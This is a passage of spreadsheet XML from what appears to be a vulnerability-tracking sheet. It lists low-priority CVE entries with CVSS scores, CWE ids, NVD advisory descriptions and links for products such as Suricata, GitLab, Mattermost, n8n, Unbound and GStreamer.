      <c r="K1314" s="5" t="inlineStr"/>
      <c r="L1314" s="5" t="inlineStr"/>
      <c r="M1314" s="5" t="inlineStr"/>
      <c r="N1314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1314" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1314" s="5" t="inlineStr"/>
      <c r="Q1314" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="R1314" s="5" t="inlineStr">
        <is>
          <t>Dell ECS versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.4.0.0, contains an Use of a Broken or Risky Cryptographic Algorithm vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure.</t>
        </is>
      </c>
      <c r="S1314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-36591</t>
        </is>
      </c>
    </row>
    <row r="1315">
      <c r="A1315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1315" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45767</t>
        </is>
      </c>
      <c r="D1315" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1315" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1315" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1315" s="5" t="inlineStr"/>
      <c r="H1315" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1315" s="5" t="inlineStr"/>
      <c r="J1315" s="5" t="inlineStr"/>
      <c r="K1315" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L1315" s="5" t="inlineStr"/>
      <c r="M1315" s="5" t="inlineStr"/>
      <c r="N1315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1315" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P1315" s="5" t="inlineStr"/>
      <c r="Q1315" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1315" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, a malicious rule could potentially overwrite any file on the file system on rule load or reload. Versions 7.0.16 and 8.0.5 fix the issue. Some workarounds are available. Preprocess `load`+ `save` rules to disallow absolute filenames for save, use Suricata's privilege dropping to limit writable files, and/or configure landlock in suricata.yaml.</t>
        </is>
      </c>
      <c r="S1315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45767</t>
        </is>
      </c>
    </row>
    <row r="1316">
      <c r="A1316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63225</t>
        </is>
      </c>
      <c r="D1316" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1316" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1316" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1316" s="5" t="inlineStr"/>
      <c r="H1316" s="5" t="inlineStr"/>
      <c r="I1316" s="5" t="inlineStr"/>
      <c r="J1316" s="5" t="inlineStr"/>
      <c r="K1316" s="5" t="inlineStr"/>
      <c r="L1316" s="5" t="inlineStr"/>
      <c r="M1316" s="5" t="inlineStr"/>
      <c r="N1316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1316" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1316" s="5" t="inlineStr"/>
      <c r="Q1316" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R1316" s="5" t="inlineStr">
        <is>
          <t>Redocly CLI makes OpenAPI validation, linting, and documentation workflows easier. Prior to @redocly/cli 2.33.2, the split command constructs output paths under --outDir from untrusted OpenAPI or AsyncAPI component names and x-codeSamples lang values without verifying that the resolved target remains inside the selected directory. A description containing literal ../ traversal segments in those fields can cause the split command to place or overwrite files outside --outDir. Component data remains constrained to YAML or JSON, and code-sample filenames remain based on the HTTP method, so this is not an unrestricted arbitrary-content file write. This issue is fixed in @redocly/cli version 2.33.2.</t>
        </is>
      </c>
      <c r="S1316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63225</t>
        </is>
      </c>
    </row>
    <row r="1317">
      <c r="A1317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1317" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65383</t>
        </is>
      </c>
      <c r="D1317" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1317" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1317" s="5" t="inlineStr"/>
      <c r="H1317" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1317" s="5" t="inlineStr"/>
      <c r="J1317" s="5" t="inlineStr"/>
      <c r="K1317" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1317" s="5" t="inlineStr"/>
      <c r="M1317" s="5" t="inlineStr"/>
      <c r="N1317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1317" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1317" s="5" t="inlineStr"/>
      <c r="Q1317" s="5" t="inlineStr"/>
      <c r="R1317" s="5" t="inlineStr">
        <is>
          <t>This issue was addressed with improved checks. This issue is fixed in macOS Golden Gate 27. An app may bypass Gatekeeper checks.</t>
        </is>
      </c>
      <c r="S1317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65383</t>
        </is>
      </c>
    </row>
    <row r="1318">
      <c r="A1318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77955</t>
        </is>
      </c>
      <c r="D1318" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1318" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1318" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G1318" s="5" t="inlineStr"/>
      <c r="H1318" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1318" s="5" t="inlineStr"/>
      <c r="J1318" s="5" t="inlineStr"/>
      <c r="K1318" s="5" t="inlineStr"/>
      <c r="L1318" s="5" t="inlineStr"/>
      <c r="M1318" s="5" t="inlineStr"/>
      <c r="N1318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1318" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1318" s="5" t="inlineStr"/>
      <c r="Q1318" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R1318" s="5" t="inlineStr">
        <is>
          <t>In NLnet Labs Unbound 1.13.2 up to and including 1.26.1, a vulnerability in ZONEMD configured zones (zonemd-check: yes) which are located below (but not at) a trust anchor allow for an attack window where (tampered with) zone contents are served (or stored to disk) prior to the ZONEMD integrity check. This is caused by the needed DS/DNSKEY asynchronous resolution that needs to happen before the ZONEMD check completes. If a zonefile is written to disk (zonefile: option) while the ZONEMD check failed, the tampered data are reloaded on startup and available until ZONEMD verification concludes again. If verification fails, the data is not served any more but still persists on disk for future reloads.</t>
        </is>
      </c>
      <c r="S1318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77955</t>
        </is>
      </c>
    </row>
    <row r="1319">
      <c r="A1319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1319" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78547</t>
        </is>
      </c>
      <c r="D1319" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1319" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1319" s="5" t="inlineStr">
        <is>
          <t>secure@citrix.com</t>
        </is>
      </c>
      <c r="G1319" s="5" t="inlineStr"/>
      <c r="H1319" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1319" s="5" t="inlineStr"/>
      <c r="J1319" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K1319" s="5" t="inlineStr"/>
      <c r="L1319" s="5" t="inlineStr"/>
      <c r="M1319" s="5" t="inlineStr"/>
      <c r="N1319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1319" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1319" s="5" t="inlineStr"/>
      <c r="Q1319" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R1319" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write vulnerability in Citrix Citrix Workspace app for Windows.
This issue affects Citrix Workspace app for Windows: before 2603.11 Current Release (CR), before 2507.1 LTSR CU3, and before LTSR 2607.</t>
        </is>
      </c>
      <c r="S1319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78547</t>
        </is>
      </c>
    </row>
    <row r="1320">
      <c r="A1320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1320" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84551</t>
        </is>
      </c>
      <c r="D1320" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1320" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1320" s="5" t="inlineStr"/>
      <c r="H1320" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1320" s="5" t="inlineStr"/>
      <c r="J1320" s="5" t="inlineStr"/>
      <c r="K1320" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1320" s="5" t="inlineStr"/>
      <c r="M1320" s="5" t="inlineStr"/>
      <c r="N1320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1320" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1320" s="5" t="inlineStr"/>
      <c r="Q1320" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1320" s="5" t="inlineStr">
        <is>
          <t>A logic issue was addressed with improved validation. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, visionOS 27, watchOS 27. An app may be able to bypass network restrictions.</t>
        </is>
      </c>
      <c r="S1320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84551</t>
        </is>
      </c>
    </row>
    <row r="1321">
      <c r="A1321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86341</t>
        </is>
      </c>
      <c r="D1321" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1321" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1321" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G1321" s="5" t="inlineStr"/>
      <c r="H1321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1321" s="5" t="inlineStr"/>
      <c r="J1321" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K1321" s="5" t="inlineStr"/>
      <c r="L1321" s="5" t="inlineStr"/>
      <c r="M1321" s="5" t="inlineStr"/>
      <c r="N1321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1321" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1321" s="5" t="inlineStr"/>
      <c r="Q1321" s="5" t="inlineStr">
        <is>
          <t>CWE-1280</t>
        </is>
      </c>
      <c r="R1321" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab EE affecting all versions from 17.1 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that, under certain conditions, an authenticated user with Owner or Maintainer permissions could have silently disabled protected environment deployment approval requirements, allowing unapproved deployments to reach production, due to improper access control checks performed after the protected resource was modified.</t>
        </is>
      </c>
      <c r="S1321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86341</t>
        </is>
      </c>
    </row>
    <row r="1322">
      <c r="A1322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1322" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88914</t>
        </is>
      </c>
      <c r="D1322" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1322" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1322" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1322" s="5" t="inlineStr"/>
      <c r="H1322" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1322" s="5" t="inlineStr"/>
      <c r="J1322" s="5" t="inlineStr"/>
      <c r="K1322" s="5" t="inlineStr"/>
      <c r="L1322" s="5" t="inlineStr"/>
      <c r="M1322" s="5" t="inlineStr"/>
      <c r="N1322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1322" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1322" s="5" t="inlineStr"/>
      <c r="Q1322" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R1322" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GStreamer's gst-plugins-good isomp4 plugin. When processing a specially crafted MP4 or MOV file containing CEA-608 closed-caption data, an integer overflow in 32-bit unsigned arithmetic can bypass a bounds check in the caption parser. This leads to an out-of-bounds heap read of up to 244 bytes, which is then included in the downstream caption output. An attacker could exploit this by tricking a user into opening a malicious media file, potentially resulting in disclosure of adjacent heap memory or application crash.</t>
        </is>
      </c>
      <c r="S1322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88914</t>
        </is>
      </c>
    </row>
    <row r="1323">
      <c r="A1323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92588</t>
        </is>
      </c>
      <c r="D1323" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1323" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1323" s="5" t="inlineStr"/>
      <c r="H1323" s="5" t="inlineStr"/>
      <c r="I1323" s="5" t="inlineStr"/>
      <c r="J1323" s="5" t="inlineStr"/>
      <c r="K1323" s="5" t="inlineStr"/>
      <c r="L1323" s="5" t="inlineStr"/>
      <c r="M1323" s="5" t="inlineStr"/>
      <c r="N1323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1323" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1323" s="5" t="inlineStr"/>
      <c r="Q1323" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1323" s="5" t="inlineStr">
        <is>
          <t>n8n is a workflow automation platform. In n8n versions before 1.123.76, 2.37.7, and 2.38.2, the source control push endpoint derived the set of files to push from the file paths and status supplied in the client request payload instead of from the server-side status computed for the requesting user. An authenticated project-scoped user (e.g., a project admin) could therefore reference files belonging to projects they have no access to and push a deletion of those projects' workflows and credentials, resulting in cross-project data destruction. Exploitation requires the Source Control (Environments) enterprise feature to be licensed, enabled, and connected to a remote repository. The issue is fixed in 1.123.76, 2.37.7, and 2.38.2.</t>
        </is>
      </c>
      <c r="S1323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92588</t>
        </is>
      </c>
    </row>
    <row r="1324">
      <c r="A1324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1324" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11993</t>
        </is>
      </c>
      <c r="D1324" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1324" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1324" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G1324" s="5" t="inlineStr"/>
      <c r="H1324" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1324" s="5" t="inlineStr"/>
      <c r="J1324" s="5" t="inlineStr"/>
      <c r="K1324" s="5" t="inlineStr"/>
      <c r="L1324" s="5" t="inlineStr"/>
      <c r="M1324" s="5" t="inlineStr"/>
      <c r="N1324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1324" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1324" s="5" t="inlineStr"/>
      <c r="Q1324" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R1324" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to properly enforce the limit of concurrent files being processed and handled failed files, which allows a user with permission to upload files to spawn more goroutines than intended and block the indexing of other files via uploading heavy files constantly to the server.. Mattermost Advisory ID: MMSA-2026-00696</t>
        </is>
      </c>
      <c r="S1324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11993</t>
        </is>
      </c>
    </row>
    <row r="1325">
      <c r="A1325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1325" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12882</t>
        </is>
      </c>
      <c r="D1325" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1325" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1325" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G1325" s="5" t="inlineStr"/>
      <c r="H1325" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1325" s="5" t="inlineStr"/>
      <c r="J1325" s="5" t="inlineStr"/>
      <c r="K1325" s="5" t="inlineStr"/>
      <c r="L1325" s="5" t="inlineStr"/>
      <c r="M1325" s="5" t="inlineStr"/>
      <c r="N1325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1325" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1325" s="5" t="inlineStr"/>
      <c r="Q1325" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R1325" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to parse Markdown autolinks with unmatched trailing closing parentheses in linear time, which allows an authenticated user with permission to create posts to cause excessive server CPU consumption and degrade availability for other users via specially crafted post or message attachment content. Mattermost Advisory ID: MMSA-2026-00703</t>
        </is>
      </c>
      <c r="S1325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12882</t>
        </is>
      </c>
    </row>
    <row r="1326">
      <c r="A1326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1326" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13417</t>
        </is>
      </c>
      <c r="D1326" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1326" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1326" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G1326" s="5" t="inlineStr"/>
      <c r="H1326" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1326" s="5" t="inlineStr"/>
      <c r="J1326" s="5" t="inlineStr"/>
      <c r="K1326" s="5" t="inlineStr"/>
      <c r="L1326" s="5" t="inlineStr"/>
      <c r="M1326" s="5" t="inlineStr"/>
      <c r="N1326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1326" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1326" s="5" t="inlineStr"/>
      <c r="Q1326" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R1326" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to validate the type of `fields.properties` on block creation which allows an authenticated user with editor access to a board to crash the Boards plugin worker and trigger a denial of service via a child block whose `fields.properties` is a non-object value. Mattermost Advisory ID: MMSA-2026-00710</t>
        </is>
      </c>
      <c r="S1326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13417</t>
        </is>
      </c>
    </row>
    <row r="1327">
      <c r="A1327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1327" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14259</t>
        </is>
      </c>
      <c r="D1327" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1327" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1327" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G1327" s="5" t="inlineStr"/>
      <c r="H1327" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1327" s="5" t="inlineStr"/>
      <c r="J1327" s="5" t="inlineStr"/>
      <c r="K1327" s="5" t="inlineStr"/>
      <c r="L1327" s="5" t="inlineStr"/>
      <c r="M1327" s="5" t="inlineStr"/>
      <c r="N1327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1327" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1327" s="5" t="inlineStr"/>
      <c r="Q1327" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1327" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to enforce board creation permissions when importing archive files which allows an authenticated non-guest team member to create Open or Private boards despite administrator restrictions via importing a crafted .boardarchive file. Mattermost Advisory ID: MMSA-2026-00712</t>
        </is>
      </c>
      <c r="S1327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14259</t>
        </is>
      </c>
    </row>
    <row r="1328">
      <c r="A1328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1328" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14344</t>
        </is>
      </c>
      <c r="D1328" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1328" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1328" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G1328" s="5" t="inlineStr"/>
      <c r="H1328" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1328" s="5" t="inlineStr"/>
      <c r="J1328" s="5" t="inlineStr"/>
      <c r="K1328" s="5" t="inlineStr"/>
      <c r="L1328" s="5" t="inlineStr"/>
      <c r="M1328" s="5" t="inlineStr"/>
      <c r="N1328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1328" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1328" s="5" t="inlineStr"/>
      <c r="Q1328" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1328" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to enforce the board-creation permission which allows an unauthorized authenticated user to create boards via the board duplicate, boards-and-blocks, and archive-import endpoints.. Mattermost Advisory ID: MMSA-2026-00715</t>
        </is>
      </c>
      <c r="S1328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14344</t>
        </is>
      </c>
    </row>
    <row r="1329">
      <c r="A1329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16794</t>
        </is>
      </c>
      <c r="D1329" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1329" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1329" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G1329" s="5" t="inlineStr"/>
      <c r="H1329" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1329" s="5" t="inlineStr"/>
      <c r="J1329" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K1329" s="5" t="inlineStr"/>
      <c r="L1329" s="5" t="inlineStr"/>
      <c r="M1329" s="5" t="inlineStr"/>
      <c r="N1329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1329" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1329" s="5" t="inlineStr"/>
      <c r="Q1329" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1329" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab EE affecting all versions from 18.11 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an authenticated user with the Security Manager role to execute arbitrary CI/CD jobs and access protected variables within group projects due to improper authorization controls on compliance framework management.</t>
        </is>
      </c>
      <c r="S1329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16794</t>
        </is>
      </c>
    </row>
    <row r="1330">
      <c r="A1330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1330" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18251</t>
        </is>
      </c>
